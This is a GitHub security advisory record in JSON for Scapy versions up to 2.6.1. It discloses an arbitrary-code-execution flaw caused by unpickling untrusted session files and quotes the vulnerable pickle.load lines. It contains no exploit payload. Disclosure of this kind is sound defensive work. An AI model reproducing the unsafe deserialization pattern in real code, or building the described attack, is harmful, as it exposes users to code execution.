{"id":"GHSA-cq46-m9x9-j8w2","summary":"Scapy Session Loading Vulnerable to Arbitrary Code Execution via Untrusted Pickle Deserialization","details":"### Summary\n\nAn unsafe deserialization vulnerability in Scapy \u003cv2.7.0 allows attackers to execute arbitrary code **when a malicious session file is locally loaded via the `-s` option**. This requires convincing a user to manually load a malicious session file.\n\n---\n\n### Details\n\nScapy’s interactive shell supports session loading using gzip-compressed pickle files:\n\n```bash\n./run_scapy -s \u003csession_file.pkl.gz\u003e\n```\n\nInternally, this triggers:\n\n```python\n# main.py\nSESSION = pickle.load(gzip.open(session_name, \"rb\"))\n```\n\nSince no validation or restriction is performed on the deserialized object, **any code embedded via `__reduce__()` will be executed immediately**. This makes it trivial for an attacker to drop a malicious `.pkl.gz` in a shared folder and have it executed by unsuspecting users.\n\nThe vulnerability exists in the `load_session` function, which deserializes data using `pickle.load()` on `.pkl.gz` files provided via the `-s` CLI flag or programmatically through `conf.session`.\n\n**Affected lines in source code**:\nhttps://github.com/secdev/scapy/blob/master/scapy/main.py#L569-L572\n\n```python\ntry:\n    s = pickle.load(gzip.open(fname, \"rb\"))\nexcept IOError:\n    try:\n        s = pickle.load(open(fname, \"rb\"))\n```\n\n### Impact\n\nThis is a classic deserialization vulnerability which leads to Code Execution (CE) when untrusted data is deserialized.\n\nAny user who can trick another user into loading a crafted `.pkl.gz` session file (e.g. via `-s` option) can execute arbitrary Python code.\n\n- **Vulnerability type:** Insecure deserialization (Python `pickle`)\n- **CWE**: [CWE-502: Deserialization of Untrusted Data](https://cwe.mitre.org/data/definitions/502.html)\n- **CVSS v4.0 Vector**: `CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N`\n- **CVSS Score**: 5.4 (Medium)\n- **Impact:** Arbitrary Code Execution\n- **Attack vector:** Local or supply chain (malicious `.pkl.gz`)\n- **Affected users:** Any user who loads session files (even interactively)\n- **Affected version:** **Scapy v2.6.1**\n\n---\n\n### Mitigations\n\n- Do not use 'sessions' (the -s option when launching Scapy).\n- Use the Scapy 2.7.0+ where the session mechanism has been removed.","modified":"2025-10-23T20:17:37.620579Z","published":"2025-10-22T16:45:49Z","database_specific":{"cwe_ids":["CWE-502"],"github_reviewed_at":"2025-10-22T16:45:49Z","nvd_published_at":null,"severity":"MODERATE","github_reviewed":true},"references":[{"type":"WEB","url":"https://github.com/secdev/scapy/security/advisories/GHSA-cq46-m9x9-j8w2"},{"type":"WEB","url":"https://github.com/secdev/scapy/commit/13621d1145b3435e9d03caf20997107a84435c0b"},{"type":"PACKAGE","url":"https://github.com/secdev/scapy"}],"affected":[{"package":{"name":"scapy","ecosystem":"PyPI","purl":"pkg:pypi/scapy"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"last_affected":"2.6.1"}]}],"versions":["2.2.0-dev","2.3.1","2.3.2","2.3.3","2.4.0","2.4.0rc3","2.4.0rc4","2.4.0rc5","2.4.1","2.4.2","2.4.3","2.4.3rc1","2.4.3rc2","2.4.3rc3","2.4.3rc4","2.4.4","2.4.4rc1","2.4.4rc2","2.4.5","2.4.5rc1","2.4rc2","2.5.0","2.5.0rc1","2.5.0rc2","2.5.0rc3","2.6.0","2.6.0rc1","2.6.0rc2","2.6.1"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-cq46-m9x9-j8w2/GHSA-cq46-m9x9-j8w2.json"}}],"schema_version":"1.7.3","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"}]}